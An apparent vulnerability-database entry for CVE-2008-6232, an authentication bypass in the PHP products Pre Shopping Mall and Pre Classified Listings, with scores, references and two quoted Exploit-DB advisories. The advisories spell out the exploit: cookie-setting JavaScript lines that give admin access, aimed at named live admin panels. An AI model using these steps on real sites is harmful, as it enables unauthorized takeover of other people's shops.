CVE-2008-6232
Published 2009-02-20
Priority: P3 · 54 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.86% (85.0th percentile)
Pre Shopping Mall allows remote attackers to bypass authentication and gain administrative access by setting the (1) adminname and the (2) adminid cookies to "admin".
No detection rules found.
Exploit-DB
Pre Shopping Mall - Insecure Cookie Handling
exploitdb·2008-11-05
---
IN THE NAME OF ALLAH
PRE SHOPPING MALL Insecure Cookie Handling
[~] Script: PRE SHOPPING MALL
[~] Language : PHP
[~] Website[main]: http://www.preproject.com
[~] Website[script]: http://www.preproject.com/emall.asp
[~] Type : Commercial
[~] Report-Date : 05/11/2008
[~] Founder : G4N0K
===[ Insecure Cookie Handling ]===
Admin Panel: http://localhost/[path]/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";
===[ LIVE ]===
Admin Panel: http://preproject.com/emall/admin/loginform.php
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";
===[ Greetz ]===
[~] ALLAH
[~] Tornado2800
[~] Hussain-X
//Are ya looking for something that has
Exploit-DB
Pre Classified Listings - Insecure Cookie Handling
exploitdb·2008-11-05
---
IN THE NAME OF ALLAH
Pre Classified Listings PHP Insecure Cookie Handling
[~] Script: Pre Classified Listings PHP version
[~] Language : PHP
[~] Website[main]: http://www.preproject.com
[~] Website[script]: http://www.preproject.com/pclphp.asp
[~] Type : Commercial
[~] Report-Date : 05/11/2008
[~] Founder : G4N0K
===[ Insecure Cookie Handling ]===
Admin Panel: http://localhost/[path]/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";
===[ LIVE ]===
Admin Panel: http://www.hostnomi.net/classi/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";
===[ Greetz ]===
[~] ALLAH
[~] Tornado2800
[~] Hussain-X
//Are ya looki
No writeups or analysis indexed.
References:
http://secunia.com/advisories/32557
http://www.vupen.com/english/advisories/2008/3017
https://exchange.xforce.ibmcloud.com/vulnerabilities/48984
https://www.exploit-db.com/exploits/6998
Published: 2009-02-20